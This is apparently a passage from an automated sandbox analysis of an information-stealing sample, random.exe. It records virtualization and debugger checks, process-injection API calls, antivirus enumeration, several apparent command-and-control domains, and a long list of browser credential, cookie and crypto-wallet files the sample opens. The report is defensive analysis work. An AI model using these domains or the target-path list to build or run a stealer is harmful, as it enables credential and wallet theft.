        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00442080 LdrInitializeThunk,3_2_00442080
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_03087F19 mov edi, dword ptr fs:[00000030h]0_2_03087F19
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_03088096 mov edi, dword ptr fs:[00000030h]0_2_03088096
        Source: C:\Users\user\Desktop\random.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_03087F19 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_03087F19
        Source: C:\Users\user\Desktop\random.exeMemory written: C:\Users\user\Desktop\random.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: random.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
        Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
        Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
